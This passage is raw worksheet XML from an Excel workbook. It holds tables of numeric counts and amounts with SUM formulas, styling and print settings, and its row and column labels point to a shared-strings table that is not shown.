    <col min="6" max="6" width="7.50390625" style="0" customWidth="1"/>
    <col min="7" max="7" width="9.125" style="0" customWidth="1"/>
    <col min="8" max="8" width="7.875" style="0" customWidth="1"/>
    <col min="9" max="9" width="10.50390625" style="0" customWidth="1"/>
    <col min="10" max="10" width="10.625" style="0" customWidth="1"/>
    <col min="11" max="11" width="8.875" style="0" customWidth="1"/>
    <col min="12" max="12" width="11.375" style="0" customWidth="1"/>
    <col min="13" max="13" width="11.125" style="0" customWidth="1"/>
    <col min="14" max="14" width="7.375" style="0" customWidth="1"/>
    <col min="15" max="15" width="8.75390625" style="0" customWidth="1"/>
    <col min="16" max="16" width="10.625" style="0" customWidth="1"/>
    <col min="17" max="17" width="8.875" style="0" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:15" ht="14.25">
      <c r="A1" s="79" t="s">
        <v>339</v>
      </c>
      <c r="B1" s="79"/>
      <c r="C1" s="79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7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70"/>
      <c r="O2" s="170"/>
      <c r="P2" s="170" t="s">
        <v>340</v>
      </c>
      <c r="Q2" s="170"/>
    </row>
    <row r="3" spans="1:17" ht="21" customHeight="1">
      <c r="A3" s="178" t="s">
        <v>341</v>
      </c>
      <c r="B3" s="168" t="s">
        <v>342</v>
      </c>
      <c r="C3" s="168"/>
      <c r="D3" s="168"/>
      <c r="E3" s="168"/>
      <c r="F3" s="168" t="s">
        <v>343</v>
      </c>
      <c r="G3" s="168"/>
      <c r="H3" s="168"/>
      <c r="I3" s="168"/>
      <c r="J3" s="168"/>
      <c r="K3" s="168"/>
      <c r="L3" s="168"/>
      <c r="M3" s="168"/>
      <c r="N3" s="168"/>
      <c r="O3" s="168"/>
      <c r="P3" s="171" t="s">
        <v>344</v>
      </c>
      <c r="Q3" s="172"/>
    </row>
    <row r="4" spans="1:17" ht="25.5" customHeight="1">
      <c r="A4" s="178"/>
      <c r="B4" s="163" t="s">
        <v>345</v>
      </c>
      <c r="C4" s="163" t="s">
        <v>346</v>
      </c>
      <c r="D4" s="163" t="s">
        <v>347</v>
      </c>
      <c r="E4" s="163" t="s">
        <v>348</v>
      </c>
      <c r="F4" s="175" t="s">
        <v>349</v>
      </c>
      <c r="G4" s="177"/>
      <c r="H4" s="175" t="s">
        <v>350</v>
      </c>
      <c r="I4" s="176"/>
      <c r="J4" s="177"/>
      <c r="K4" s="175" t="s">
        <v>351</v>
      </c>
      <c r="L4" s="176"/>
      <c r="M4" s="177"/>
      <c r="N4" s="175" t="s">
        <v>352</v>
      </c>
      <c r="O4" s="177"/>
      <c r="P4" s="173" t="s">
        <v>353</v>
      </c>
      <c r="Q4" s="173" t="s">
        <v>354</v>
      </c>
    </row>
    <row r="5" spans="1:17" ht="23.25" customHeight="1">
      <c r="A5" s="178"/>
      <c r="B5" s="164"/>
      <c r="C5" s="164"/>
      <c r="D5" s="164"/>
      <c r="E5" s="164"/>
      <c r="F5" s="97" t="s">
        <v>355</v>
      </c>
      <c r="G5" s="115" t="s">
        <v>356</v>
      </c>
      <c r="H5" s="97" t="s">
        <v>355</v>
      </c>
      <c r="I5" s="115" t="s">
        <v>356</v>
      </c>
      <c r="J5" s="100" t="s">
        <v>357</v>
      </c>
      <c r="K5" s="97" t="s">
        <v>355</v>
      </c>
      <c r="L5" s="115" t="s">
        <v>356</v>
      </c>
      <c r="M5" s="100" t="s">
        <v>358</v>
      </c>
      <c r="N5" s="97" t="s">
        <v>355</v>
      </c>
      <c r="O5" s="115" t="s">
        <v>356</v>
      </c>
      <c r="P5" s="174"/>
      <c r="Q5" s="174"/>
    </row>
    <row r="6" spans="1:17" s="21" customFormat="1" ht="18" customHeight="1">
      <c r="A6" s="56" t="s">
        <v>359</v>
      </c>
      <c r="B6" s="53">
        <f aca="true" t="shared" si="0" ref="B6:Q6">SUM(B7:B17)</f>
        <v>2219767</v>
      </c>
      <c r="C6" s="53">
        <f t="shared" si="0"/>
        <v>1903100</v>
      </c>
      <c r="D6" s="53">
        <f t="shared" si="0"/>
        <v>57000</v>
      </c>
      <c r="E6" s="53">
        <f t="shared" si="0"/>
        <v>259667</v>
      </c>
      <c r="F6" s="53">
        <f t="shared" si="0"/>
        <v>3</v>
      </c>
      <c r="G6" s="53">
        <f t="shared" si="0"/>
        <v>86100</v>
      </c>
      <c r="H6" s="53">
        <f t="shared" si="0"/>
        <v>6</v>
      </c>
      <c r="I6" s="53">
        <f t="shared" si="0"/>
        <v>167600</v>
      </c>
      <c r="J6" s="53">
        <f t="shared" si="0"/>
        <v>56567</v>
      </c>
      <c r="K6" s="53">
        <f t="shared" si="0"/>
        <v>32</v>
      </c>
      <c r="L6" s="53">
        <f t="shared" si="0"/>
        <v>1669000</v>
      </c>
      <c r="M6" s="53">
        <f t="shared" si="0"/>
        <v>240500</v>
      </c>
      <c r="N6" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="O6" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="P6" s="116">
        <f t="shared" si="0"/>
        <v>2219767</v>
      </c>
      <c r="Q6" s="116">
        <f t="shared" si="0"/>
        <v>41</v>
      </c>
    </row>
    <row r="7" spans="1:17" ht="17.25" customHeight="1">
      <c r="A7" s="134" t="s">
        <v>382</v>
      </c>
      <c r="B7" s="117">
        <f>SUM(C7:E7)</f>
        <v>92100</v>
      </c>
      <c r="C7" s="23">
        <v>34600</v>
      </c>
      <c r="D7" s="23"/>
      <c r="E7" s="23">
        <v>57500</v>
      </c>
      <c r="F7" s="23">
        <v>2</v>
      </c>
      <c r="G7" s="23">
        <v>61100</v>
      </c>
      <c r="H7" s="23"/>
      <c r="I7" s="23"/>
      <c r="J7" s="23"/>
      <c r="K7" s="23">
        <v>1</v>
      </c>
      <c r="L7" s="23">
        <v>31000</v>
      </c>
      <c r="M7" s="23"/>
      <c r="N7" s="23"/>
      <c r="O7" s="23"/>
      <c r="P7" s="118">
        <f>SUM(G7,I7,J7,L7,M7,O7)</f>
        <v>92100</v>
      </c>
      <c r="Q7" s="119">
        <f>F7+H7+K7+N7</f>
        <v>3</v>
      </c>
    </row>
    <row r="8" spans="1:17" ht="17.25" customHeight="1">
      <c r="A8" s="134" t="s">
        <v>383</v>
      </c>
      <c r="B8" s="117">
        <f aca="true" t="shared" si="1" ref="B8:B17">SUM(C8:E8)</f>
        <v>98000</v>
      </c>
      <c r="C8" s="23">
        <v>98000</v>
      </c>
      <c r="D8" s="23"/>
      <c r="E8" s="23"/>
      <c r="F8" s="23"/>
      <c r="G8" s="23"/>
      <c r="H8" s="23"/>
      <c r="I8" s="23"/>
      <c r="J8" s="23"/>
      <c r="K8" s="23">
        <v>3</v>
      </c>
      <c r="L8" s="23"/>
      <c r="M8" s="23">
        <v>98000</v>
      </c>
      <c r="N8" s="23"/>
      <c r="O8" s="23"/>
      <c r="P8" s="118">
        <f aca="true" t="shared" si="2" ref="P8:P16">SUM(G8,I8,J8,L8,M8,O8)</f>
        <v>98000</v>
      </c>
      <c r="Q8" s="119">
        <f aca="true" t="shared" si="3" ref="Q8:Q16">F8+H8+K8+N8</f>
        <v>3</v>
      </c>
    </row>
    <row r="9" spans="1:17" ht="17.25" customHeight="1">
      <c r="A9" s="134" t="s">
        <v>384</v>
      </c>
      <c r="B9" s="117">
        <f t="shared" si="1"/>
        <v>92500</v>
      </c>
      <c r="C9" s="23">
        <v>92500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2</v>
      </c>
      <c r="L9" s="23"/>
      <c r="M9" s="23">
        <v>92500</v>
      </c>
      <c r="N9" s="23">
        <v>0</v>
      </c>
      <c r="O9" s="23">
        <v>0</v>
      </c>
      <c r="P9" s="118">
        <f t="shared" si="2"/>
        <v>92500</v>
      </c>
      <c r="Q9" s="119">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="10" spans="1:17" ht="17.25" customHeight="1">
      <c r="A10" s="134" t="s">
        <v>385</v>
      </c>
      <c r="B10" s="117">
        <f t="shared" si="1"/>
        <v>106567</v>
      </c>
      <c r="C10" s="23">
        <v>60000</v>
      </c>
      <c r="D10" s="23">
        <v>12000</v>
      </c>
      <c r="E10" s="23">
        <v>34567</v>
      </c>
      <c r="F10" s="23"/>
      <c r="G10" s="23"/>
      <c r="H10" s="23">
        <v>2</v>
      </c>
      <c r="I10" s="23"/>
      <c r="J10" s="23">
        <v>56567</v>
      </c>
      <c r="K10" s="23">
        <v>1</v>
      </c>
      <c r="L10" s="23"/>
      <c r="M10" s="23">
        <v>50000</v>
      </c>
      <c r="N10" s="23"/>
      <c r="O10" s="23"/>
      <c r="P10" s="118">
        <f>SUM(G10,I10,J10,L10,M10,O10)</f>
        <v>106567</v>
      </c>
      <c r="Q10" s="119">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="11" spans="1:17" ht="17.25" customHeight="1">
      <c r="A11" s="134" t="s">
        <v>386</v>
      </c>
      <c r="B11" s="117">
        <f t="shared" si="1"/>
        <v>455000</v>
      </c>
      <c r="C11" s="23">
        <v>455000</v>
      </c>
      <c r="D11" s="23"/>
      <c r="E11" s="23"/>
      <c r="F11" s="23"/>
      <c r="G11" s="23"/>
      <c r="H11" s="23"/>
      <c r="I11" s="23"/>
      <c r="J11" s="23"/>
      <c r="K11" s="23">
        <v>6</v>
      </c>
      <c r="L11" s="23">
        <v>455000</v>
      </c>
      <c r="M11" s="23"/>
      <c r="N11" s="23"/>
      <c r="O11" s="23"/>
      <c r="P11" s="118">
        <f t="shared" si="2"/>
        <v>455000</v>
      </c>
      <c r="Q11" s="119">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="12" spans="1:17" ht="17.25" customHeight="1">
      <c r="A12" s="134" t="s">
        <v>387</v>
      </c>
      <c r="B12" s="117">
        <f t="shared" si="1"/>
        <v>165000</v>
      </c>
      <c r="C12" s="23">
        <v>165000</v>
      </c>
      <c r="D12" s="23"/>
      <c r="E12" s="23"/>
      <c r="F12" s="23"/>
      <c r="G12" s="23"/>
      <c r="H12" s="23"/>
      <c r="I12" s="23"/>
      <c r="J12" s="23"/>
      <c r="K12" s="23">
        <v>3</v>
      </c>
      <c r="L12" s="23">
        <v>165000</v>
      </c>
      <c r="M12" s="23"/>
      <c r="N12" s="23"/>
      <c r="O12" s="23"/>
      <c r="P12" s="118">
        <f t="shared" si="2"/>
        <v>165000</v>
      </c>
      <c r="Q12" s="119">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="13" spans="1:17" ht="17.25" customHeight="1">
      <c r="A13" s="134" t="s">
        <v>388</v>
      </c>
      <c r="B13" s="117">
        <f t="shared" si="1"/>
        <v>180800</v>
      </c>
      <c r="C13" s="23">
        <v>180000</v>
      </c>
      <c r="D13" s="23"/>
      <c r="E13" s="23">
        <v>800</v>
      </c>
      <c r="F13" s="23"/>
      <c r="G13" s="23"/>
      <c r="H13" s="23">
        <v>1</v>
      </c>
      <c r="I13" s="23">
        <v>800</v>
      </c>
      <c r="J13" s="23"/>
      <c r="K13" s="23">
        <v>4</v>
      </c>
      <c r="L13" s="23">
        <v>180000</v>
      </c>
      <c r="M13" s="23"/>
      <c r="N13" s="23"/>
      <c r="O13" s="23"/>
      <c r="P13" s="118">
        <f t="shared" si="2"/>
        <v>180800</v>
      </c>
      <c r="Q13" s="119">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="14" spans="1:17" ht="17.25" customHeight="1">
      <c r="A14" s="134" t="s">
        <v>389</v>
      </c>
      <c r="B14" s="117">
        <f t="shared" si="1"/>
        <v>236000</v>
      </c>
      <c r="C14" s="23">
        <v>216000</v>
      </c>
      <c r="D14" s="23">
        <v>20000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4</v>
      </c>
      <c r="L14" s="23">
        <v>236000</v>
      </c>
      <c r="M14" s="23"/>
      <c r="N14" s="23">
        <v>0</v>
      </c>
      <c r="O14" s="23">
        <v>0</v>
      </c>
      <c r="P14" s="118">
        <f t="shared" si="2"/>
        <v>236000</v>
      </c>
      <c r="Q14" s="119">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="15" spans="1:17" ht="17.25" customHeight="1">
      <c r="A15" s="134" t="s">
        <v>390</v>
      </c>
      <c r="B15" s="117">
        <f t="shared" si="1"/>
        <v>381000</v>
      </c>
      <c r="C15" s="23">
        <v>190000</v>
      </c>
      <c r="D15" s="23">
        <v>25000</v>
      </c>
      <c r="E15" s="23">
        <v>166000</v>
      </c>
      <c r="F15" s="23">
        <v>1</v>
      </c>
      <c r="G15" s="23">
        <v>25000</v>
      </c>
      <c r="H15" s="23">
        <v>2</v>
      </c>
      <c r="I15" s="23">
        <v>166000</v>
      </c>
      <c r="J15" s="23"/>
      <c r="K15" s="23">
        <v>3</v>
      </c>
      <c r="L15" s="23">
        <v>190000</v>
      </c>
      <c r="M15" s="23"/>
      <c r="N15" s="23"/>
      <c r="O15" s="23"/>
      <c r="P15" s="118">
        <f t="shared" si="2"/>
        <v>381000</v>
      </c>
      <c r="Q15" s="119">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="16" spans="1:17" ht="17.25" customHeight="1">
      <c r="A16" s="134" t="s">
        <v>391</v>
      </c>
      <c r="B16" s="117">
        <f t="shared" si="1"/>
        <v>352000</v>
      </c>
      <c r="C16" s="23">
        <v>352000</v>
      </c>
      <c r="D16" s="23"/>
      <c r="E16" s="23"/>
      <c r="F16" s="23"/>
      <c r="G16" s="23"/>
      <c r="H16" s="23"/>
      <c r="I16" s="23"/>
      <c r="J16" s="23"/>
      <c r="K16" s="23">
        <v>3</v>
      </c>
      <c r="L16" s="23">
        <v>352000</v>
      </c>
      <c r="M16" s="23"/>
      <c r="N16" s="23"/>
      <c r="O16" s="23"/>
      <c r="P16" s="118">
        <f t="shared" si="2"/>
        <v>352000</v>
      </c>
      <c r="Q16" s="119">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="17" spans="1:17" ht="17.25" customHeight="1">
      <c r="A17" s="134" t="s">
        <v>392</v>
      </c>
      <c r="B17" s="117">
        <f t="shared" si="1"/>
        <v>60800</v>
      </c>
      <c r="C17" s="23">
        <v>60000</v>
      </c>
      <c r="D17" s="23"/>
      <c r="E17" s="23">
        <v>800</v>
      </c>
      <c r="F17" s="23"/>
      <c r="G17" s="23"/>
      <c r="H17" s="23">
        <v>1</v>
      </c>
      <c r="I17" s="23">
        <v>800</v>
      </c>
      <c r="J17" s="23"/>
      <c r="K17" s="23">
        <v>2</v>
      </c>
      <c r="L17" s="23">
        <v>60000</v>
      </c>
      <c r="M17" s="23"/>
      <c r="N17" s="23"/>
      <c r="O17" s="23"/>
      <c r="P17" s="118">
        <f>SUM(G17,I17,J17,L17,M17,O17)</f>
        <v>60800</v>
      </c>
      <c r="Q17" s="119">
        <f>F17+H17+K17+N17</f>
        <v>3</v>
      </c>
    </row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="16">
    <mergeCell ref="B3:E3"/>
    <mergeCell ref="F3:O3"/>
    <mergeCell ref="A3:A5"/>
    <mergeCell ref="B4:B5"/>
    <mergeCell ref="C4:C5"/>
    <mergeCell ref="D4:D5"/>
    <mergeCell ref="E4:E5"/>
    <mergeCell ref="F4:G4"/>
    <mergeCell ref="P2:Q2"/>
    <mergeCell ref="P3:Q3"/>
    <mergeCell ref="P4:P5"/>
    <mergeCell ref="Q4:Q5"/>
    <mergeCell ref="H4:J4"/>
    <mergeCell ref="K4:M4"/>
    <mergeCell ref="N4:O4"/>
    <mergeCell ref="N2:O2"/>
  </mergeCells>
  <printOptions horizontalCentered="1" verticalCentered="1"/>
  <pageMargins left="0.5" right="0.5511811023622047" top="0.62" bottom="0.5905511811023623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6"/>
  <sheetViews>
    <sheetView zoomScaleSheetLayoutView="100" zoomScalePageLayoutView="0" workbookViewId="0" topLeftCell="A1">
      <pane ySplit="5" topLeftCell="A6" activePane="bottomLeft" state="frozen"/>
      <selection pane="topLeft" activeCell="B28" sqref="B28:B29"/>
      <selection pane="bottomLeft" activeCell="A6" sqref="A6"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="20.25" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="6.50390625" style="1" customWidth="1"/>
    <col min="2" max="2" width="9.125" style="1" customWidth="1"/>
    <col min="3" max="3" width="8.875" style="1" customWidth="1"/>
    <col min="4" max="4" width="8.125" style="1" customWidth="1"/>
    <col min="5" max="6" width="8.00390625" style="1" customWidth="1"/>
    <col min="7" max="7" width="7.25390625" style="1" bestFit="1" customWidth="1"/>
    <col min="8" max="9" width="9.00390625" style="1" bestFit="1" customWidth="1"/>
    <col min="10" max="10" width="9.625" style="1" customWidth="1"/>
    <col min="11" max="11" width="9.875" style="1" customWidth="1"/>
    <col min="12" max="12" width="9.00390625" style="1" bestFit="1" customWidth="1"/>
    <col min="13" max="14" width="10.75390625" style="1" bestFit="1" customWidth="1"/>
    <col min="15" max="15" width="9.00390625" style="1" bestFit="1" customWidth="1"/>
    <col min="16" max="16384" width="9.00390625" style="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:15" s="12" customFormat="1" ht="21.75" customHeight="1">
      <c r="A1" s="10" t="s">
        <v>393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2" customFormat="1" ht="21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 t="s">
        <v>333</v>
      </c>
      <c r="O2" s="10"/>
    </row>
    <row r="3" spans="1:15" ht="21.75" customHeight="1">
      <c r="A3" s="179" t="s">
        <v>178</v>
      </c>
      <c r="B3" s="179" t="s">
        <v>150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5" ht="18.75" customHeight="1">
      <c r="A4" s="179"/>
      <c r="B4" s="62" t="s">
        <v>0</v>
      </c>
      <c r="C4" s="62" t="s">
        <v>110</v>
      </c>
      <c r="D4" s="62" t="s">
        <v>111</v>
      </c>
      <c r="E4" s="62" t="s">
        <v>112</v>
      </c>
      <c r="F4" s="62" t="s">
        <v>113</v>
      </c>
      <c r="G4" s="62" t="s">
        <v>7</v>
      </c>
      <c r="H4" s="62" t="s">
        <v>114</v>
      </c>
      <c r="I4" s="62" t="s">
        <v>115</v>
      </c>
      <c r="J4" s="62" t="s">
        <v>116</v>
      </c>
      <c r="K4" s="62" t="s">
        <v>117</v>
      </c>
      <c r="L4" s="62" t="s">
        <v>118</v>
      </c>
      <c r="M4" s="62" t="s">
        <v>119</v>
      </c>
      <c r="N4" s="62" t="s">
        <v>120</v>
      </c>
      <c r="O4" s="62" t="s">
        <v>121</v>
      </c>
    </row>
    <row r="5" spans="1:15" ht="18" customHeight="1">
      <c r="A5" s="54" t="s">
        <v>10</v>
      </c>
      <c r="B5" s="67">
        <f aca="true" t="shared" si="0" ref="B5:O5">SUM(B6:B16)</f>
        <v>21</v>
      </c>
      <c r="C5" s="67">
        <f t="shared" si="0"/>
        <v>1</v>
      </c>
      <c r="D5" s="67">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="E5" s="67">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="F5" s="67">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="G5" s="67">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="H5" s="67">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="I5" s="67">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="J5" s="67">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="K5" s="67">
        <f t="shared" si="0"/>
        <v>2</v>
      </c>
      <c r="L5" s="67">
        <f t="shared" si="0"/>
        <v>3</v>
      </c>
      <c r="M5" s="67">
        <f t="shared" si="0"/>
        <v>13</v>
      </c>
      <c r="N5" s="67">
        <f t="shared" si="0"/>
        <v>2</v>
      </c>
      <c r="O5" s="67">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="6" spans="1:15" ht="18" customHeight="1">
      <c r="A6" s="134" t="s">
        <v>382</v>
      </c>
      <c r="B6" s="73">
        <f>SUM(C6:O6)</f>
        <v>3</v>
      </c>
      <c r="C6" s="13"/>
      <c r="D6" s="13"/>
      <c r="E6" s="13"/>
      <c r="F6" s="13"/>
      <c r="G6" s="13"/>
      <c r="H6" s="13"/>
      <c r="I6" s="13"/>
      <c r="J6" s="13"/>
      <c r="K6" s="13">
        <v>2</v>
      </c>
      <c r="L6" s="13">
        <v>1</v>
      </c>
      <c r="M6" s="13"/>
      <c r="N6" s="13"/>
      <c r="O6" s="13"/>
    </row>
    <row r="7" spans="1:15" ht="18" customHeight="1">
      <c r="A7" s="134" t="s">
        <v>383</v>
      </c>
      <c r="B7" s="73">
        <f aca="true" t="shared" si="1" ref="B7:B16">SUM(C7:O7)</f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8" customHeight="1">
      <c r="A8" s="134" t="s">
        <v>384</v>
      </c>
      <c r="B8" s="73">
        <f t="shared" si="1"/>
        <v>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3">
        <v>0</v>
      </c>
      <c r="O8" s="13">
        <v>0</v>
      </c>
    </row>
    <row r="9" spans="1:15" ht="18" customHeight="1">
      <c r="A9" s="134" t="s">
        <v>385</v>
      </c>
      <c r="B9" s="73">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="C9" s="13"/>
      <c r="D9" s="13"/>
      <c r="E9" s="13"/>
      <c r="F9" s="13"/>
      <c r="G9" s="13"/>
      <c r="H9" s="13"/>
      <c r="I9" s="13"/>
      <c r="J9" s="13"/>
      <c r="K9" s="13"/>
      <c r="L9" s="13">
        <v>1</v>
      </c>
      <c r="M9" s="13">
        <v>3</v>
      </c>
      <c r="N9" s="13"/>
      <c r="O9" s="13"/>
    </row>
    <row r="10" spans="1:15" ht="18" customHeight="1">
      <c r="A10" s="134" t="s">
        <v>386</v>
      </c>
      <c r="B10" s="73">
        <f t="shared" si="1"/>
        <v>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>
        <v>5</v>
      </c>
      <c r="N10" s="13"/>
      <c r="O10" s="13"/>
    </row>
    <row r="11" spans="1:15" ht="18" customHeight="1">
      <c r="A11" s="134" t="s">
        <v>387</v>
      </c>
      <c r="B11" s="73">
        <f t="shared" si="1"/>
        <v>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8" customHeight="1">
      <c r="A12" s="134" t="s">
        <v>388</v>
      </c>
      <c r="B12" s="73">
        <f t="shared" si="1"/>
        <v>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>
        <v>1</v>
      </c>
      <c r="N12" s="13"/>
      <c r="O12" s="13"/>
    </row>
    <row r="13" spans="1:15" ht="18" customHeight="1">
      <c r="A13" s="134" t="s">
        <v>389</v>
      </c>
      <c r="B13" s="73">
        <f t="shared" si="1"/>
        <v>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8" customHeight="1">
      <c r="A14" s="134" t="s">
        <v>390</v>
      </c>
      <c r="B14" s="73">
        <f t="shared" si="1"/>
        <v>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>
        <v>1</v>
      </c>
      <c r="N14" s="13">
        <v>1</v>
      </c>
      <c r="O14" s="13"/>
    </row>
    <row r="15" spans="1:15" ht="18" customHeight="1">
      <c r="A15" s="134" t="s">
        <v>391</v>
      </c>
      <c r="B15" s="73">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="C15" s="13"/>
      <c r="D15" s="13"/>
      <c r="E15" s="13"/>
      <c r="F15" s="13"/>
      <c r="G15" s="13"/>
      <c r="H15" s="13"/>
      <c r="I15" s="13"/>
      <c r="J15" s="13"/>
      <c r="K15" s="13"/>
      <c r="L15" s="13">
        <v>1</v>
      </c>
      <c r="M15" s="13">
        <v>1</v>
      </c>
      <c r="N15" s="13">
        <v>1</v>
      </c>
      <c r="O15" s="13"/>
    </row>
    <row r="16" spans="1:15" ht="18" customHeight="1">
      <c r="A16" s="134" t="s">
        <v>392</v>
      </c>
      <c r="B16" s="73">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="C16" s="13">
        <v>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1</v>
      </c>
      <c r="N16" s="13">
        <v>0</v>
      </c>
      <c r="O16" s="13">
        <v>0</v>
      </c>
    </row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="2">
    <mergeCell ref="B3:O3"/>
    <mergeCell ref="A3:A4"/>
  </mergeCells>
  <printOptions horizontalCentered="1" verticalCentered="1"/>
  <pageMargins left="0.31496062992125984" right="0.03937007874015748" top="0.7874015748031497" bottom="0.5905511811023623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6"/>
  <sheetViews>
    <sheetView zoomScaleSheetLayoutView="75" zoomScalePageLayoutView="0" workbookViewId="0" topLeftCell="A1">
      <pane ySplit="5" topLeftCell="A6" activePane="bottomLeft" state="frozen"/>
      <selection pane="topLeft" activeCell="B28" sqref="B28:B29"/>
      <selection pane="bottomLeft" activeCell="A6" sqref="A6"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="20.25" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="6.50390625" style="1" customWidth="1"/>
    <col min="2" max="2" width="10.375" style="1" customWidth="1"/>
    <col min="3" max="3" width="8.25390625" style="1" customWidth="1"/>
    <col min="4" max="4" width="7.25390625" style="1" customWidth="1"/>
    <col min="5" max="7" width="7.75390625" style="1" bestFit="1" customWidth="1"/>
    <col min="8" max="10" width="9.25390625" style="1" bestFit="1" customWidth="1"/>
    <col min="11" max="11" width="9.375" style="1" bestFit="1" customWidth="1"/>
    <col min="12" max="12" width="9.50390625" style="1" bestFit="1" customWidth="1"/>
    <col min="13" max="14" width="11.00390625" style="1" bestFit="1" customWidth="1"/>
    <col min="15" max="15" width="9.50390625" style="1" bestFit="1" customWidth="1"/>
    <col min="16" max="16" width="10.75390625" style="1" bestFit="1" customWidth="1"/>
    <col min="17" max="16384" width="9.00390625" style="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:15" ht="22.5" customHeight="1">
      <c r="A1" s="180" t="s">
        <v>394</v>
      </c>
      <c r="B1" s="180"/>
      <c r="C1" s="180"/>
      <c r="D1" s="180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2.5" customHeight="1">
      <c r="A2" s="74"/>
      <c r="B2" s="74"/>
      <c r="C2" s="74"/>
      <c r="D2" s="74"/>
      <c r="E2" s="5"/>
      <c r="F2" s="5"/>
      <c r="G2" s="5"/>
      <c r="H2" s="5"/>
      <c r="I2" s="5"/>
      <c r="J2" s="5"/>
      <c r="K2" s="5"/>
      <c r="L2" s="5"/>
      <c r="M2" s="5"/>
      <c r="N2" s="181" t="s">
        <v>331</v>
      </c>
      <c r="O2" s="181"/>
    </row>
    <row r="3" spans="1:15" ht="22.5" customHeight="1">
      <c r="A3" s="179" t="s">
        <v>178</v>
      </c>
      <c r="B3" s="179" t="s">
        <v>151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5" ht="22.5" customHeight="1">
      <c r="A4" s="179"/>
      <c r="B4" s="62" t="s">
        <v>0</v>
      </c>
      <c r="C4" s="62" t="s">
        <v>110</v>
      </c>
      <c r="D4" s="62" t="s">
        <v>111</v>
      </c>
      <c r="E4" s="62" t="s">
        <v>112</v>
      </c>
      <c r="F4" s="62" t="s">
        <v>113</v>
      </c>
      <c r="G4" s="62" t="s">
        <v>7</v>
      </c>
      <c r="H4" s="62" t="s">
        <v>114</v>
      </c>
      <c r="I4" s="62" t="s">
        <v>115</v>
      </c>
      <c r="J4" s="62" t="s">
        <v>116</v>
      </c>
      <c r="K4" s="62" t="s">
        <v>117</v>
      </c>
      <c r="L4" s="62" t="s">
        <v>118</v>
      </c>
      <c r="M4" s="62" t="s">
        <v>119</v>
      </c>
      <c r="N4" s="62" t="s">
        <v>120</v>
      </c>
      <c r="O4" s="62" t="s">
        <v>121</v>
      </c>
    </row>
    <row r="5" spans="1:16" ht="18" customHeight="1">
      <c r="A5" s="54" t="s">
        <v>10</v>
      </c>
      <c r="B5" s="67">
        <f>SUM(B6:B16)</f>
        <v>319080</v>
      </c>
      <c r="C5" s="95">
        <f aca="true" t="shared" si="0" ref="C5:O5">SUM(C6:C16)</f>
        <v>7</v>
      </c>
      <c r="D5" s="67">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="E5" s="67">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="F5" s="67">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="G5" s="67">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="H5" s="67">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="I5" s="67">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="J5" s="67">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="K5" s="67">
        <f t="shared" si="0"/>
        <v>8348</v>
      </c>
      <c r="L5" s="67">
        <f t="shared" si="0"/>
        <v>21523</v>
      </c>
      <c r="M5" s="67">
        <f t="shared" si="0"/>
        <v>207702</v>
      </c>
      <c r="N5" s="67">
        <f t="shared" si="0"/>
        <v>81500</v>
      </c>
      <c r="O5" s="67">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="P5" s="16"/>
    </row>
    <row r="6" spans="1:17" ht="18" customHeight="1">
      <c r="A6" s="134" t="s">
        <v>382</v>
      </c>
      <c r="B6" s="71">
        <f>SUM(C6:O6)</f>
        <v>13871</v>
      </c>
      <c r="C6" s="13"/>
      <c r="D6" s="13"/>
      <c r="E6" s="13"/>
      <c r="F6" s="13"/>
      <c r="G6" s="13"/>
      <c r="H6" s="13"/>
      <c r="I6" s="13"/>
      <c r="J6" s="13"/>
      <c r="K6" s="13">
        <v>8348</v>
      </c>
      <c r="L6" s="13">
        <v>5523</v>
      </c>
      <c r="M6" s="13"/>
      <c r="N6" s="13"/>
      <c r="O6" s="13"/>
      <c r="P6" s="137">
        <v>13871</v>
      </c>
      <c r="Q6" s="1">
        <v>48200</v>
      </c>
    </row>
    <row r="7" spans="1:17" ht="18" customHeight="1">
      <c r="A7" s="134" t="s">
        <v>383</v>
      </c>
      <c r="B7" s="71">
        <f aca="true" t="shared" si="1" ref="B7:B16">SUM(C7:O7)</f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7">
        <v>0</v>
      </c>
      <c r="Q7" s="1">
        <v>20000</v>
      </c>
    </row>
